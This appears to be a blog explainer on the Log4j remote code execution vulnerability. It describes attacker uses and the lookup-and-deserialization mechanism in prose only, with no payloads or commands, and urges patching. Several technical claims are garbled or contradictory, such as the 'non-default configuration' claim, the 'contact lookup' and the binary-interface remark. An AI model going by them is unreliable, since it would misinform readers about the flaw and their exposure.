If you work in cyber security or web development, you have likely heard of the Apache Log4j vulnerability. Many cyber security experts are struggling to fix this vulnerability and malicious attackers can take great advantage of it. Log4j is a piece of software that is leveraged by programmers to help them if they are logging data in their application.
What is Logging Data?
Logging data is equivalent to keeping a diary of activities or actions performed in the application for security reasons. This can be for security reasons like looking at the various authentications that have happened. This allows you to log malicious activity. It can also be for keeping a record of things that have happened in the application for debugging purposes.
It is very common and it is used in many applications, particularly the ones which are written in the JAVA programming language. There are a large number of applications that use JAVA, including all the apache applications. Apache has also unveiled risk mitigations for Log4j. Many companies have also implemented internal mitigations for prevention.
Log4j
Log4j is essentially apache software that developers use to log different events that happen in JAVA based applications. Since it is part of the apache software foundation, the software is open source, meaning it is free to use for developers. Furthermore, it is very commonly used in many organizations, and people leverage the ability of logging different user activities and events.
Fundamentally, it is a logging library, and its popularity is due to the fact that it enables runtime without affecting the actual application binary interface. This means that you have a very lightweight library that you can use for logging activities. While using it, it will not affect the actual speed or performance of your application.
Using Log4j also provides you with plenty of control over what goes into the output of whatever log files that your logs are dumping to. What you write in the Log4j library is what matters when it comes to cyber security risks. If the software sees something that points to a web address, it will try and download the content of that web address and execute it.
There are valid reasons for this functionality. Your business website probably reaches out to other web addresses to drive in fonts and style sheets and other appearance aspects. Despite this being very common, to be within the logging mechanism of an application has an unethical undertone. Many people argue that this mechanism should be disabled by default and you should have had to explicitly turn it on.
Explaining the Exploit
You need to go into the actual vulnerability of Log4j and how hackers can potentially take advantage of this exploit. This exploit allows hackers and malicious actors to perform remote code execution. In the cyber security realm, remote code execution is looked down upon by professionals and considered a very high risk and high severity vulnerability.
Remote Code Execution
Remote code execution means that anyone in any part of the world, using any computer can run code using system privileges which have weaknesses. This also heightens the possibility of ransomware and other forms of malware to cause disruption. Once the attacker compromises the credentials, they are able to access all data points of another application and cause exploitation. This is why it is a very big risk of leaving this exploit unfixed for many organizations.
With remote code execution, an attacker can also take advantage of your device which also means that they can steal data as well as install different types of malware. This is very bad because it means that attackers are taking advantage of this exploit as companies are scrambling to fix it.
They are finding that they have remote access and remote code execution abilities in many different systems and across many different tech companies. Many programmers deem this vulnerability as one of the highest level of severity based on its ease of use and function. Today, you can likely find script keys that try to find pre-packaged code for exploitation purposes.
How Hackers Take Advantage of Log4j vulnerability?
Malicious hackers will hack into systems for many purposes. The first few exploits that were common started with hackers breaking into minecraft servers. Some also hacked into systems to use them for crypto mining as well as developing malware to create large-scale denial-of-service attacks. Hackers will also use this to create their own botnets.
Ransomware by Log4j
Ransomware is one of the biggest scares of the Log4j vulnerability. Ransomware is an event in which a malicious actor enters into a computer system and encrypts your access to valuable data. This means that you are no longer able to access your data unless you have the decryption key. The attacker will then demand ransom from your end in exchange for the decryption key.
Most commonly, hackers will ask you to pay them in bitcoin, which is a form of digital currency. Until you pay them the fee, they will freeze all access to your valuable data, which will have you face plenty of downtime costs. Usually, this will not delete the actual software for ransomware, and they could continuously keep doing that every other month, leaving you with no choice but to pay the fees.
Most enterprises have valuable and critical data that they cannot afford to lose, which is why ransomware attackers will often give the people a deadline which is usually within a few days or weeks. This sense of pressure and panic makes it very difficult for people to cope with a ransomware attack, especially if they already have their software on your servers and machines.
The severity of this exploit will be very high because of the prospects of remote code execution. This will allow you to install any software on the target machine. It will also allow you to run anything you would like. Not only that, it will also allow you to take advantage of the machine, steal data, install malware and many other harmful practices.
There are thousands of applications and websites on the internet that use Log4js for many different things. Whether it is for logging, debugging or any other purposes, there is a very large list of applications that use it. This means that this attack can impact companies around the globe.
Why YOU should Care?
The way in which Log4j is exploited is that anyone who attempts to connect to a web server running Log4j in the background can send in the request to collect malicious code. They can even type a malicious URL at another source. That source will then push the code into the Log4j mechanism, and it will then look up the web address, download it, and execute that code.
The Log4j vulnerability is already being weaponized and malicious actors are actively trying to exploit numerous websites that people run. The worst case scenario is that your system can be compromised. They insert code into a form of a web request to one of the systems that your business runs and is accessible from the web.
It can execute a remote access Trojan, which allows the hacker to take control of the system that they have compromised. From then onwards, they can either move laterally through your business, or perform horrible things to it. Some small fixes to this problem involve patches that many small vendors are releasing. It is also possible just to go and change the settings to explicitly deny the feature.
If you are currently uncertain whether your system may be susceptible to this, it is important to patch ubiquity unified controllers straight away since there are many things that are vulnerable to this. Thus, there is a serious reason why there is a meltdown over this vulnerability.
How the Attack Works?
You must be able to understand how exactly hackers carry out this attack in depth, especially if you are a developer. In Log4j, there is a certain configuration that is non-default which allows attackers to take advantage of applications or websites. This allows attackers to have control over certain input data when the logging configurations use a certain pattern layout.
Either it is a contact lookup, or a thread context map which is basically using this to create malicious input using specific patterns. The main issue here is that Log4j will allow lookups to appear in log messages so this means that whenever a user input is logged, it can download serialized java code from that server.
Afterwards, this code will get activated when de-serialized, which essentially makes up the remote code execution attack. In terms of mitigation, Apache did release a new version of the Log4j software library, which is an advisable option to install for developers.
Final Thoughts
Whether it is ransomware attackers, nation states, script kitties, or random people, all of them are finding out about this exploit and trying to take advantage of it. This is one of the highest severities that you must pay attention to in terms of your cyber security. To counter this threat, you may have to patch the latest upgrades, and make whatever changes that are needed for your application that is reliant on Log4j capabilities.
References
https://www.geeksforgeeks.org/serialization-in-java/